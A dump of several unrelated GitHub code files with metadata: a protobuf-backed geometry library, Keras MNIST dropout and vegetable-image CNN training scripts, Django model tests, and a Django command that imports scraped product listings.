geometry_pb2.ProjectionData = None,\n result_proj: geometry_pb2.ProjectionData = None):\n if other_geom is None:\n if result_proj:\n return self.project(to_proj=result_proj)\n return self\n\n return self._two_geom_op(other_geom=other_geom,\n operator_type=geometry_pb2.UNION,\n operation_proj=operation_proj,\n result_proj=result_proj)\n\n @staticmethod\n def cascaded_union(geometry_iterable: Iterable,\n percent_reduction: int = 0,\n max_point_count: int = 0,\n batch_size: int = 25):\n \"\"\"\n union an iterable list of geometries\n @param geometry_iterable: input list of geometries\n @param percent_reduction: if generalizing the output, how much to reduce the geometry by\n @param max_point_count: if generalizing the output, what is the max number of points\n @param batch_size: batch size for number of geometries to stream up to service\n @return: a unioned geometry\n \"\"\"\n intermediate = []\n for geometry in geometry_iterable:\n intermediate.append(geometry)\n if len(intermediate) == batch_size:\n # every stream_interval items\n intermediate = [geometry_init.geometry_service.op_client_stream(intermediate)]\n\n result = intermediate[0]\n if len(intermediate) > 1:\n result = geometry_init.geometry_service.op_client_stream(intermediate)\n\n if percent_reduction == 0 and max_point_count == 0:\n # if no generalize\n return result\n\n return result.generalize(percent_reduction=percent_reduction, max_point_count=max_point_count)\n\n @staticmethod\n def s_cascaded_union(geometry_iterable: Iterable[BaseGeometry]):\n \"\"\"\nunion geometries locally using shapely union.\n @param geometry_iterable:\n @return:\n \"\"\"\n geometries = [geometry for geometry in geometry_iterable]\n projs = [geometry.proj for geometry in geometries]\n sample_proj = None\n for i, proj in enumerate(projs):\n if i == len(projs) - 2:\n sample_proj = proj\n break\n if not proj_eq(proj, projs[i]):\n raise ValueError(\"all geometries must have the same spatial reference\")\n\n try:\n L = len(geometries)\n except TypeError:\n geometries = [geometries]\n L = 1\n subs = (c_void_p * L)()\n for i, g in enumerate(geometries):\n subs[i] = g._geom\n collection = lgeos.GEOSGeom_createCollection(6, subs, L)\n return geom_factory(lgeos.methods['cascaded_union'](collection), proj=sample_proj)\n\n def _operation_proj(self,\n other_geom: BaseGeometry,\n operation_proj: geometry_pb2.ProjectionData = None):\n if operation_proj is None and not self.proj_eq(other_geom.proj):\n operation_proj = self.proj\n warn(\"left and right geometries have different proj and operation_proj is None. defaulting \"\n \"operation_proj to the left geometry proj: \\n{}\".format(self.proj))\n return operation_proj\n\n def _two_geom_op(self,\n other_geom: BaseGeometry,\n operator_type: geometry_pb2.OperatorType,\n operation_proj: geometry_pb2.ProjectionData = None,\n result_proj: geometry_pb2.ProjectionData = None):\n operation_proj = self._operation_proj(other_geom=other_geom, operation_proj=operation_proj)\n\n op_request = geometry_pb2.GeometryRequest(left_geometry=self.geometry_data,\n right_geometry=other_geom.geometry_data,\n operator=operator_type,\n operation_proj=operation_proj,\n result_proj=result_proj,\n result_encoding=RESULT_ENCODING)\n return BaseGeometry.import_protobuf(geometry_init.geometry_service.operate(op_request).geometry)\n\n def equals(self,\n other_geom: BaseGeometry,\n operation_proj: geometry_pb2.ProjectionData = None):\n \"\"\"\n Returns True if geometries are equal, else False.\n :param other_geom: other geometry\n :param operation_proj: if geometries have different spatial references, project both geometries to one spatial\n reference for execution of equality\n :return:\n \"\"\"\n return self._relate(other_geom=other_geom, relate_type=geometry_pb2.EQUALS, operation_proj=operation_proj)\n\n def contains(self,\n other_geom: BaseGeometry,\n operation_proj: geometry_pb2.ProjectionData = None):\n return self._relate(other_geom=other_geom, relate_type=geometry_pb2.CONTAINS, operation_proj=operation_proj)\n\n def within(self,\n other_geom: BaseGeometry,\n operation_proj: geometry_pb2.ProjectionData = None):\n return self._relate(other_geom=other_geom, relate_type=geometry_pb2.WITHIN, operation_proj=operation_proj)\n\n def touches(self,\n other_geom: BaseGeometry,\n operation_proj: geometry_pb2.ProjectionData = None):\n return self._relate(other_geom=other_geom, relate_type=geometry_pb2.TOUCHES, operation_proj=operation_proj)\n\n def overlaps(self,\n other_geom: BaseGeometry,\n operation_proj: geometry_pb2.ProjectionData = None):\n return self._relate(other_geom=other_geom, relate_type=geometry_pb2.OVERLAPS, operation_proj=operation_proj)\n\n def crosses(self,\n other_geom: BaseGeometry,\n operation_proj: geometry_pb2.ProjectionData = None):\n return self._relate(other_geom=other_geom, relate_type=geometry_pb2.CROSSES, operation_proj=operation_proj)\n\n def disjoint(self,\n other_geom: BaseGeometry,\n operation_proj: geometry_pb2.ProjectionData = None):\n return self._relate(other_geom=other_geom, relate_type=geometry_pb2.DISJOINT, operation_proj=operation_proj)\n\n def intersects(self,\n other_geom: BaseGeometry,\n operation_proj: geometry_pb2.ProjectionData = None):\n return self._relate(other_geom=other_geom, relate_type=geometry_pb2.INTERSECTS, operation_proj=operation_proj)\n\n def _relate(self,\n other_geom: BaseGeometry,\n relate_type: geometry_pb2.OperatorType,\n operation_proj: geometry_pb2.ProjectionData = None):\n operation_proj = self._operation_proj(other_geom=other_geom, operation_proj=operation_proj)\n\n op_request = geometry_pb2.GeometryRequest(left_geometry=self.geometry_data,\n right_geometry=other_geom.geometry_data,\n operator=relate_type,\n operation_proj=operation_proj)\n return geometry_init.geometry_service.operate(op_request).spatial_relationship\n\n def generalize(self, percent_reduction=0, max_point_count=0, remove_degenerates=True):\n generalize_by_area_params = geometry_pb2.Params.GeneralizeByArea(\n percent_reduction=percent_reduction,\n max_point_count=max_point_count,\n remove_degenerates=remove_degenerates\n )\n\n op_request = geometry_pb2.GeometryRequest(geometry=self.geometry_data,\n operator=geometry_pb2.GENERALIZE_BY_AREA,\n generalize_by_area_params=generalize_by_area_params,\n result_encoding=RESULT_ENCODING)\n\n geometry_response = geometry_init.geometry_service.operate(op_request)\n return BaseGeometry.import_protobuf(geometry_response.geometry)\n\n @property\n def geometry_data(self) -> geometry_pb2.GeometryData:\n \"\"\"\n create a GeometryData protobuf object from the current geometry\n :return: GeometryData object with a defined spatial reference\n \"\"\"\n return geometry_pb2.GeometryData(ewkb=self.wkb, proj=self._proj)\n\n @property\n def envelope_data(self):\n \"\"\"\n create a EnvelopeData protobuf object from the current geometry with\n the spatial reference defined from the geometry spatial reference\n :return: EnvelopeData protobuf object\n \"\"\"\n return geometry_pb2.EnvelopeData(xmin=self.bounds[0],\n ymin=self.bounds[1],\n xmax=self.bounds[2],\n ymax=self.bounds[3],\n proj=self._proj)\n\n @property\n def shapely_dump(self):\n \"\"\"\nCreate a shapely geometry instance from the epl geometry instance\n @return:\n \"\"\"\n return shapely_loads_wkb(self.wkb)\n\n @property\n def carto_geom(self):\n \"\"\"\nCarto was not playing nice with our wrapper of shapely\n @return:\n \"\"\"\n return self.shapely_dump\n\n @property\n def carto_bounds(self):\n \"\"\"\nbounds order according to carto\n @return:\n \"\"\"\n b = self.bounds\n return b[0], b[2], b[1], b[3]\n\n def translate(self, x_offset=0.0, y_offset=0.0, geodetic=True):\n \"\"\"\n translates (or offset) a geometry by the values. If geodetic (default), then offsets are in meters, otherwise,\n offsets are in unit of spatial reference (for wgs-84, unit is degrees)\n :param x_offset: offset in x direction (or in longitude direction). Offset is added to all x values in geometry\n :param y_offset: offset in y direction (or in latitude direction). Offset is added to all y values in geometry\n :param geodetic: project geometry to wgs-84 and shift geometry by meters. If set to false, offsets are executed\n in spatial reference of geometry\n :return: new geometry\n \"\"\"\n local_proj = None\n if geodetic:\n centroid = self.project(to_proj=geometry_pb2.ProjectionData(epsg=4326)).centroid\n local_proj = geometry_pb2.ProjectionData(\n custom=geometry_pb2.ProjectionData.Custom(lon_0=centroid.x,\n lat_0=centroid.y))\n\n affine_transform_params = geometry_pb2.Params.AffineTransform(x_offset=x_offset,\n y_offset=y_offset)\n op_translate = geometry_pb2.GeometryRequest(geometry=self.geometry_data,\n affine_transform_params=affine_transform_params,\n operator=geometry_pb2.AFFINE_TRANSFORM,\n operation_proj=local_proj,\n result_proj=self.proj,\n result_encoding=RESULT_ENCODING)\n geometry_response = geometry_init.geometry_service.operate(op_translate)\n return BaseGeometry.import_protobuf(geometry_response.geometry)\n\n def length(self, geodetic=True):\n if not geodetic:\n return self.s_length\n op_length = geometry_pb2.GeometryRequest(geometry=self.geometry_data,\n operator=geometry_pb2.GEODETIC_LENGTH)\n geometry_response = geometry_init.geometry_service.operate(op_length)\n return geometry_response.measure\n\n\nclass BaseMultipartGeometry(BaseGeometry):\n\n def shape_factory(self, *args):\n # Factory for part instances, usually a geometry class\n raise NotImplementedError(\"To be implemented by derived classes\")\n\n @property\n def ctypes(self):\n raise NotImplementedError(\n \"Multi-part geometries have no ctypes representations\")\n\n @property\n def __array_interface__(self):\n \"\"\"Provide the Numpy array protocol.\"\"\"\n raise NotImplementedError(\"Multi-part geometries do not themselves \"\n \"provide the array interface\")\n\n def _get_coords(self):\n raise NotImplementedError(\"Sub-geometries may have coordinate \"\n \"sequences, but collections do not\")\n\n def _set_coords(self, ob):\n raise NotImplementedError(\"Sub-geometries may have coordinate \"\n \"sequences, but collections do not\")\n\n @property\n def coords(self):\n raise NotImplementedError(\n \"Multi-part geometries do not provide a coordinate sequence\")\n\n @property\n def geoms(self):\n if self.is_empty:\n return []\n return GeometrySequence(self, self.shape_factory)\n\n def __iter__(self):\n if not self.is_empty:\n return iter(self.geoms)\n else:\n return iter([])\n\n def __len__(self):\n if not self.is_empty:\n return len(self.geoms)\n else:\n return 0\n\n def __getitem__(self, index):\n if not self.is_empty:\n return self.geoms[index]\n else:\n return ()[index]\n\n def __eq__(self, other):\n return (\n type(other) == type(self) and\n len(self) == len(other) and\n all(x == y for x, y in zip(self, other)) and\n self._proj_eq__(other)\n )\n\n def _proj_eq__(self, other):\n return proj_eq(self.proj, other.proj)\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n __hash__ = None\n\n def svg(self, scale_factor=1., color=None):\n \"\"\"Returns a group of SVG elements for the multipart geometry.\n Parameters\n ==========\n scale_factor : float\n Multiplication factor for the SVG stroke-width. Default is 1.\n color : str, optional\n Hex string for stroke or fill color. Default is to use \"#66cc99\"\n if geometry is valid, and \"#ff3333\" if invalid.\n \"\"\"\n if self.is_empty:\n return '<g />'\n if color is None:\n color = \"#66cc99\" if self.is_valid else \"#ff3333\"\n return '<g>' + \\\n ''.join(p.svg(scale_factor, color) for p in self) + \\\n '</g>'\n\n\nclass GeometrySequence(object):\n \"\"\"\n Iterative access to members of a homogeneous multipart geometry.\n \"\"\"\n\n # Attributes\n # ----------\n # _factory : callable\n # Returns instances of Shapely geometries\n # _geom : c_void_p\n # Ctypes pointer to the parent's GEOS geometry\n # _ndim : int\n # Number of dimensions (2 or 3, generally)\n # __p__ : object\n # Parent (Shapely) geometry\n shape_factory = None\n _geom = None\n __p__ = None\n _ndim = None\n\n def __init__(self, parent, type):\n self.shape_factory = type\n self.__p__ = parent\n\n def _update(self):\n self._geom = self.__p__._geom\n self._ndim = self.__p__._ndim\n\n def _get_geom_item(self, i):\n g = self.shape_factory()\n g._other_owned = True\n g._geom = lgeos.GEOSGetGeometryN(self._geom, i)\n g._ndim = self._ndim\n g.__p__ = self\n return g\n\n def __iter__(self):\n self._update()\n for i in range(self.__len__()):\n yield self._get_geom_item(i)\n\n def __len__(self):\n self._update()\n return lgeos.GEOSGetNumGeometries(self._geom)\n\n def __getitem__(self, key):\n self._update()\n m = self.__len__()\n if isinstance(key, integer_types):\n if key + m < 0 or key >= m:\n raise IndexError(\"index out of range\")\n if key < 0:\n i = m + key\n else:\n i = key\n return self._get_geom_item(i)\n elif isinstance(key, slice):\n if type(self) == HeterogeneousGeometrySequence:\n raise TypeError(\n \"Heterogenous geometry collections are not sliceable\")\n res = []\n start, stop, stride = key.indices(m)\n for i in range(start, stop, stride):\n res.append(self._get_geom_item(i))\n return type(self.__p__)(res or None)\n else:\n raise TypeError(\"key must be an index or slice\")\n\n @property\n def _longest(self):\n max = 0\n for g in iter(self):\n l = len(g.coords)\n if l > max:\n max = l\n\n\nclass HeterogeneousGeometrySequence(GeometrySequence):\n \"\"\"\n Iterative access to a heterogeneous sequence of geometries.\n \"\"\"\n\n def __init__(self, parent):\n super(HeterogeneousGeometrySequence, self).__init__(parent, None)\n\n def _get_geom_item(self, i):\n sub = lgeos.GEOSGetGeometryN(self._geom, i)\n g = geom_factory(sub, parent=self)\n g._other_owned = True\n return g\n\n\nclass EmptyGeometry(BaseGeometry):\n def __init__(self):\n \"\"\"Create an empty geometry.\"\"\"\n BaseGeometry.__init__(self)\n\n\nclass RPCReader(object):\n _lgeos = None\n _reader_wkb = None\n _reader_wkt = None\n _geometry_data = None\n\n def __init__(self, lgeos, geometry_data: geometry_pb2.GeometryData):\n \"\"\"Create Reader\"\"\"\n self._lgeos = lgeos\n self._geometry_data = geometry_data\n # TODO, manage geometry_data with geojson and eprojishape\n if len(self._geometry_data.wkt) > 0:\n self._reader_wkt = self._lgeos.GEOSWKTReader_create()\n elif len(geometry_data.ewkb) > 0:\n self._reader_wkb = self._lgeos.GEOSWKBReader_create()\n elif len(geometry_data.wkb) > 0:\n self._reader_wkb = self._lgeos.GEOSWKBReader_create()\n # TODO raise an exception here\n\n def __del__(self):\n \"\"\"Destroy Reader\"\"\"\n if self._lgeos is not None:\n if self._reader_wkb is not None:\n self._lgeos.GEOSWKBReader_destroy(self._reader_wkb)\n self._reader_wkb = None\n elif self._reader_wkt is not None:\n self._lgeos.GEOSWKTReader_destroy(self._reader_wkt)\n self._reader_wkt = None\n self._lgeos = None\n\n def read(self):\n geom = None\n if len(self._geometry_data.wkt) > 0:\n geom = self.read_wkt()\n elif len(self._geometry_data.wkb) > 0:\n geom = self.read_wkb(self._geometry_data.wkb)\n elif len(self._geometry_data.ewkb) > 0:\n geom = self.read_wkb(self._geometry_data.ewkb)\n result = geom_factory(geom, proj=self._geometry_data.proj)\n return result\n\n def read_wkb(self, wkb_bytes_array):\n geom = self._lgeos.GEOSWKBReader_read(\n self._reader_wkb, c_char_p(wkb_bytes_array), c_size_t(len(wkb_bytes_array)))\n if not geom:\n raise ValueError(\n \"Could not create geometry because of errors \"\n \"while reading input.\")\n return geom\n\n def read_wkt(self):\n \"\"\"Returns geometry from WKT\"\"\"\n text = self._geometry_data.wkt\n if sys.version_info[0] >= 3:\n text = self._geometry_data.wkt.encode('ascii')\n geom = self._lgeos.GEOSWKTReader_read(self._reader_wkt, c_char_p(text))\n if not geom:\n raise ValueError(\n \"Could not create geometry because of errors \"\n \"while reading input.\")\n return geom\n\n\ndef get_proj(proj: geometry_pb2.ProjectionData = None, epsg: int = 0, proj4: str = \"\"):\n if (proj is None or (proj.epsg == 0 and len(proj.proj4) == 0 and not proj.HasField('custom'))) and \\\n epsg == 0 and len(proj4) == 0:\n raise ValueError(\"must define a spatial reference for geometry on creation, \"\n \"must be epsg or proj4 (wkt not supported)\")\n if proj is None and epsg > 0:\n proj = geometry_pb2.ProjectionData(epsg=epsg)\n elif proj is None and len(proj4) > 0:\n proj = geometry_pb2.ProjectionData(proj4=proj4)\n return proj\n\n\ndef proj_eq(proj: geometry_pb2.ProjectionData, other_proj: geometry_pb2.ProjectionData):\n if proj.epsg > 0:\n return proj.epsg == other_proj.epsg\n elif len(proj.proj4) > 0:\n return proj.proj4 == other_proj.proj4\n elif len(proj.wkt) > 0:\n return proj.wkt == other_proj.wkt\n return False\n","repo_name":"sunny-g/geo-grpc-api","sub_path":"python/epl_geometry/epl/geometry/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":58524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"29009837914","text":"\"\"\"CAP-6619 Deep Learning Fall 2018 term project\nMNIST with standard deep neural network and dropout\n\nDropout paper: http://jmlr.org/papers/volume15/srivastava14a.old/srivastava14a.pdf # noqa\n\"\"\"\nimport time\nimport pandas as pd\nimport json\nimport os\nfrom tensorflow.keras import models\nfrom tensorflow.keras import layers\nfrom tensorflow.keras import optimizers\nfrom tensorflow.keras import backend\nfrom tensorflow.keras.utils import to_categorical\nfrom tensorflow.keras.constraints import max_norm\nfrom tensorflow.keras.datasets import mnist\nfrom datetime import datetime\nfrom io import StringIO\nfrom argparse import ArgumentParser\nfrom CAP6619_term_project_mnist_mlp_dropout_parameters import Parameters\n\n\ndef create_model(parameters):\n \"\"\"Create a model described by the given parameters.\"\"\"\n # To make lines shorter\n p = parameters\n\n model = models.Sequential()\n\n if p.network == 'standard':\n model.add(layers.Dense(p.units_per_layer,\n activation='relu',\n input_shape=(pixels_per_image,)))\n for _ in range(p.hidden_layers - 1):\n model.add(layers.Dense(p.units_per_layer, activation='relu'))\n elif p.network in ('dropout_no_adjustment', 'dropout'):\n units_hidden_layer = 0\n if p.network == 'dropout':\n # Adjust number of units in each layer: '...if an n-sized layer is\n # optimal for a standard neural net on any given task, a good\n # dropout net should have at least n/p units.' [Note that Keras\n # uses a 'drop' rate, not 'keep', hence the '1 -'].\n units_hidden_layer = int(\n p.units_per_layer / (1 - p.dropout_rate_hidden_layer))\n else:\n units_hidden_layer = p.units_per_layer\n\n model.add(layers.Dropout(p.dropout_rate_input_layer,\n input_shape=(pixels_per_image,)))\n for _ in range(p.hidden_layers):\n # Reason to use he_normal initializer: source code the paper points\n # to has 'initialization: DENSE_GAUSSIAN_SQRT_FAN_IN' for weights.\n if p.max_norm_max_value == 'none':\n model.add(layers.Dense(units_hidden_layer, activation='relu',\n kernel_initializer='he_normal'))\n else:\n model.add(layers.Dense(units_hidden_layer, activation='relu',\n kernel_initializer='he_normal',\n kernel_constraint=max_norm(\n int(p.max_norm_max_value))))\n model.add(layers.Dropout(rate=p.dropout_rate_hidden_layer))\n else:\n assert False # Invalid network type\n\n # All networks end with the sofmax layer to identify the 0-9 digits\n model.add(layers.Dense(10, activation='softmax'))\n\n # Create the optimizer\n optimizer = None\n if p.optimizer == 'sgd':\n optimizer = optimizers.SGD(\n p.learning_rate, momentum=float(p.sgd_momentum), decay=p.decay)\n elif p.optimizer == 'rmsprop':\n optimizer = optimizers.RMSprop(p.learning_rate, decay=p.decay)\n else:\n assert False # Invalid optimizer\n\n model.compile(optimizer=optimizer,\n loss='categorical_crossentropy',\n metrics=['accuracy'])\n\n return model\n\n\ndef test_model(parameters, end_experiment_callback, verbose):\n \"\"\"Test one model: create, train, evaluate with test data and save\n results.\"\"\"\n # To make lines shorter\n p = parameters\n\n model = create_model(parameters)\n\n start = time.process_time()\n model.fit(train_images, train_labels, epochs=p.epochs,\n batch_size=p.batch_size,\n validation_data=(test_images, test_labels),\n verbose=verbose)\n training_time = time.process_time() - start\n\n start = time.process_time()\n test_loss, test_acc = model.evaluate(\n test_images, test_labels, verbose=verbose)\n\n test_time = time.process_time() - start\n\n end_experiment_callback(parameters, model, test_loss,\n test_acc, training_time, test_time)\n\n\ndef save_experiment(parameters, model, test_loss, test_acc,\n training_time, test_time):\n \"\"\"Save results from one experiment.\"\"\"\n # To save some typing\n p = parameters\n\n # Even though we have information about the optimizer in the parameters,\n # we read directly from the model as insurance against coding mistakes.\n optimizer = model.optimizer\n optimizer_name = type(optimizer).__name__\n\n experiments.loc[len(experiments)] = [\n p.experiment_name, datetime.now().strftime('%Y-%m-%d_%H:%M:%S'),\n 'MNIST', p.network, optimizer_name, test_loss, test_acc,\n p.hidden_layers, p.units_per_layer, p.epochs, p.batch_size,\n p.dropout_rate_input_layer, p.dropout_rate_hidden_layer,\n backend.eval(optimizer.lr), p.decay, p.sgd_momentum,\n p.max_norm_max_value, model.count_params(), training_time, test_time]\n\n # Show progress so far to the user\n print(experiments)\n\n # Save progress so far into the file used for this experiment\n results_file = p.experiment_name + '_results.txt'\n # First, get a formatted string; if we use to_string(header=False) it\n # will use only one space between columns, instead of formatting\n # considering the column name (the header).\n # Also ensure that we use a fixed-length size for the network name to\n # keep the columns aligned.\n output = StringIO()\n experiments.to_string(output, formatters={\n 'Network': '{:>25}'.format}, header=True)\n if os.path.isfile(results_file):\n # File already exists - append data without column names.\n with open(results_file, 'a') as f:\n f.write(os.linesep)\n f.write(output.getvalue().splitlines()[1])\n output.close()\n else:\n # File doesn't exist yet - create and write column names + data\n with open(results_file, 'w') as f:\n f.write(output.getvalue())\n\n # Save training history and model for this specific experiment.\n # The model object must be a trained model, which means it has a `history`\n # object with the training results for each epoch.\n # We need to save the history separately because `model.save` won't save\n # it - it saves only the model data.\n\n # File where the training history and model will be saved. The name encodes\n # the test the parameters used in the epxeriment.\n base_name_template = ('{}_nw={}_opt={}_hl={:03d}_uhl={:04d}_e={:02d}'\n '_bs={:04d}_dri={:0.2f}_drh={:0.2f}_lr={:0.4f}'\n '_d={:0.4f}_m={}_mn={}')\n base_name = base_name_template.format(\n p.experiment_name, p.network, p.optimizer, p.hidden_layers,\n p.units_per_layer, p.epochs, p.batch_size,\n p.dropout_rate_input_layer, p.dropout_rate_hidden_layer,\n p.learning_rate, p.decay, p.sgd_momentum, p.max_norm_max_value,\n )\n\n with open(base_name + '_history.json', 'w') as f:\n json.dump(model.history.history, f)\n # Uncomment to save the model - it may take quite a bit of disk space\n # model.save(base_name + '_model.h5')\n\n\ndef parse_command_line():\n \"\"\"Parse command line parameters into a `Parameters` variable.\"\"\"\n ap = ArgumentParser(description='Dropout with MNIST data set.')\n\n ap.add_argument('--experiment_name', type=str)\n ap.add_argument('--network', type=str)\n ap.add_argument('--optimizer', type=str)\n ap.add_argument('--hidden_layers', type=int)\n ap.add_argument('--units_per_layer', type=int)\n ap.add_argument('--epochs', type=int)\n ap.add_argument('--batch_size', type=int)\n ap.add_argument('--dropout_rate_input_layer', type=float)\n ap.add_argument('--dropout_rate_hidden_layer', type=float)\n ap.add_argument('--learning_rate', type=float)\n ap.add_argument('--decay', type=float)\n ap.add_argument('--sgd_momentum', type=str)\n ap.add_argument('--max_norm_max_value', type=str)\n\n args = ap.parse_args()\n\n return Parameters(\n experiment_name=args.experiment_name,\n network=args.network,\n optimizer=args.optimizer,\n hidden_layers=args.hidden_layers,\n units_per_layer=args.units_per_layer,\n epochs=args.epochs,\n batch_size=args.batch_size,\n dropout_rate_input_layer=args.dropout_rate_input_layer,\n dropout_rate_hidden_layer=args.dropout_rate_hidden_layer,\n learning_rate=args.learning_rate,\n decay=args.decay,\n sgd_momentum=args.sgd_momentum,\n max_norm_max_value=args.max_norm_max_value,\n )\n\n\n# Store data from the experiments\nexperiments = pd.DataFrame(columns=[\n 'ExperimentName', 'TestTime', 'DataSetName', 'Network', 'Optimizer',\n 'TestLoss', 'TestAccuracy', 'HiddenLayers', 'UnitsPerLayer', 'Epochs',\n 'BatchSize', 'DropoutRateInput', 'DropoutRateHidden', 'LearningRate',\n 'Decay', 'SgdMomentum', 'MaxNorm', 'ModelParamCount', 'TrainingCpuTime',\n 'TestCpuTime'])\n\n\n# The input shape: pixels_per_image pixels images from MNIST data set\npixels_per_image = 28 * 28\n\n# Load and prepare data.\n# Note that they are global variables used in the functions above. A future\n# improvement could be to add them to the parameters data structure.\nstart = time.process_time()\n(train_images, train_labels), (test_images, test_labels) = mnist.load_data()\ntrain_labels = to_categorical(train_labels)\ntest_labels = to_categorical(test_labels)\nprint('Timing: load and prepare data: {0:.5f}s'.format(\n time.process_time() - start))\n\ntrain_images = train_images.reshape((60000, pixels_per_image))\ntrain_images = train_images.astype('float32') / 255\ntest_images = test_images.reshape((10000, pixels_per_image))\ntest_images = test_images.astype('float32') / 255\n\np = parse_command_line()\n\nif all(param is None for param in p):\n # No command line parameter provided - running from within IDE. Build the\n # test configuration, warn the user and run in verbose mode.\n print('\\n\\n --- No command-line parameters - running with defaults\\n\\n')\n\n test_params = Parameters(\n experiment_name='dropout_mnist_mlp',\n network='dropout',\n optimizer='rmsprop',\n hidden_layers=4,\n units_per_layer=512,\n epochs=5,\n batch_size=128,\n dropout_rate_input_layer=0.1,\n dropout_rate_hidden_layer=0.5,\n learning_rate=0.001,\n decay=0.0,\n sgd_momentum='none',\n max_norm_max_value='none',\n )\n test_model(test_params, save_experiment, verbose=1)\nelse:\n # Running from the command line - use those parameters and reduce amount\n # of output from Keras to support nohup execution.\n test_model(p, save_experiment, verbose=2)\n","repo_name":"fau-masters-collected-works-cgarbin/dropout-vs-batch-normalization","sub_path":"mlp/dropout/CAP6619_term_project_mnist_mlp_dropout.py","file_name":"CAP6619_term_project_mnist_mlp_dropout.py","file_ext":"py","file_size_in_byte":10812,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"37"} +{"seq_id":"23694403295","text":"# %%\nimport os\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.layers import Conv2D,MaxPool2D,Dense,activation,Activation,Flatten\nfrom keras.optimizers import Adam\nimport matplotlib.pyplot as pyplot\n\ntrain_datagen = ImageDataGenerator(rescale=1/255.)\nvalid_datagen = ImageDataGenerator(rescale=1/255.)\n\ntrain_gen = train_datagen.flow_from_directory(\n '/home/satish/samples/vegetableDataset/Vegetable Images/train',\n target_size= (224,224),\n batch_size=32,\n class_mode ='categorical'\n)\n\n\n# %%\nvalid_gen = valid_datagen.flow_from_directory(\n '/home/satish/samples/vegetableDataset/Vegetable Images/validation',\n target_size=(224,224),\n batch_size=32,\n class_mode='categorical')\n\n\nmodel = keras.models.Sequential()\nmodel.add(Conv2D(32, (3,3),activation='relu',input_shape=(224,224,3)))\nmodel.add(MaxPool2D((2,2)))\nmodel.add(Conv2D(64, (3,3),activation='relu'))\nmodel.add(MaxPool2D((2,2)))\nmodel.add(Conv2D(128, (3,3),activation='relu'))\nmodel.add(MaxPool2D((2,2)))\nmodel.add(Flatten())\nmodel.add(Dense(256,activation='relu'))\nmodel.add(Dense(15,activation='softmax'))\n\nprint(model.summary())\n\n\nmodel.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['acc'])\n\nhistory = model.fit(train_gen,epochs=10,steps_per_epoch=100,validation_data=valid_gen,validation_steps=15)\n\n\n#saving the model and weights to hdf5 file\nmodel.save('vegetable_model.hdf5')\n\n#saving the model in pb format for tfserving using tf.saved_model.save function...\n# need to create a folder to save all the details and the required format for the tfserving... \nos.makedirs('vegetable_model', exist_ok=True)\n\ntf.saved_model.save(model, 'vegetable_model/1/')\n\n# %%\n","repo_name":"satish-madugula/tf-serving","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28593552185","text":"from django.core.exceptions import ValidationError\nfrom parameterized import parameterized\n\nfrom .test_studies_base import StudiesBaseTest\n\n\nclass SubjectModelsTest(StudiesBaseTest):\n def setUp(self) -> None:\n self.subject = self.make_subject()\n return super().setUp()\n\n @parameterized.expand([\n ('name', 255),\n ('color', 8)\n ])\n def test_subject_fields_max_legth(self, field, max_length):\n setattr(self.subject, field, 'A' * (max_length + 1))\n with self.assertRaises(ValidationError):\n self.subject.full_clean()\n","repo_name":"Werberty/study-organizer","sub_path":"studies/tests/test_studies_model_subject.py","file_name":"test_studies_model_subject.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"26455505220","text":"import json\nfrom django.core.management.base import BaseCommand\nfrom django.utils import timezone\nfrom product.models import Category, Product, PriceSource, SearchQuery, PriceHistory\nimport os\nimport requests\nfrom django.core.files import File\nimport time\nfrom django.db import transaction\n\n\ndef filter_invalid_prices(price_dict):\n \"\"\"\n Filters Invalid Prices\n \"\"\"\n filtered_dict = {key: value for key, value in price_dict.items() if value[0] is not None}\n return filtered_dict\n\nclass Command(BaseCommand):\n help = 'Adds scraped products to the database'\n\n def handle(self, *args, **options):\n json_file_path = os.path.abspath('./spyders/[ALL] - Listings.json')\n with open(json_file_path, 'r') as json_file:\n scraped_data = json.load(json_file)\n print(len(scraped_data))\n product_attributes = {}\n\n for i, j in scraped_data.items():\n for products in j:\n attributes_dict = {}\n for product_id, product_data in products.items():\n price = product_data[4]['price']\n name = product_data[1]['title']\n id = product_id\n product_url = product_data[12]['url']\n source_name = product_data[13]['source']\n description = \"{} - {}\".format(product_data[5]['city'], product_data[6]['sub_city'])\n category = product_data[3]['cat_name']\n main_cat = product_data[2]['main_cat']\n attrib_data = product_data[7]['attrs']\n for data_dict in attrib_data:\n for key, value in data_dict.items():\n attributes_dict[key] = value\n date_added = product_data[-2]['date_added']\n date_scraped = product_data[-1]['date_scraped']\n user_id = product_data[-7]['user_id']\n thumbnail_url = product_data[-5]['images']\n phone = product_data[-8]['phone']\n\n product_attributes[id] = [price, name, id, product_url, source_name, description, category, attributes_dict, date_added, date_scraped, user_id, thumbnail_url, phone, main_cat]\n\n filtered_product_attributes = filter_invalid_prices(product_attributes)\n prices = list()\n price_sources = {}\n new_price = list()\n price_change = list()\n\n price_types = []\n with transaction.atomic():\n for i, (j, k) in enumerate(filtered_product_attributes.items()):\n print(i, j)\n\n if k[-1] == \"Electronics\":\n\n category, created = Category.objects.get_or_create(name=k[6])\n\n price_source, created = PriceSource.objects.get_or_create(\n source_site=k[4],\n source_phone=k[-2],\n )\n\n try:\n products, created = Product.objects.get_or_create(\n id=k[2],\n name= k[1],\n location= k[5],\n product_url= k[3],\n date_added= timezone.datetime.fromisoformat(k[-6]),\n date_scraped=timezone.datetime.fromisoformat(k[-5]),\n category= category,\n attributes= k[7],\n thumbnail_url= k[-3],\n price_value=k[0],\n price_source=price_source)\n except Exception as e:\n print(\"In exception - {}\".format(e))\n price_histories, created = PriceHistory.objects.get_or_create(\n id=k[2],\n product=Product.objects.get(id=k[2]),\n price=k[0],\n \n ) \n","repo_name":"EskiasYilma/WisePenny","sub_path":"product/management/commands/add_jiji_data.py","file_name":"add_jiji_data.py","file_ext":"py","file_size_in_byte":4033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"494979653","text":"import unittest\nimport tempfile\nimport os.path\n\nfrom PIL 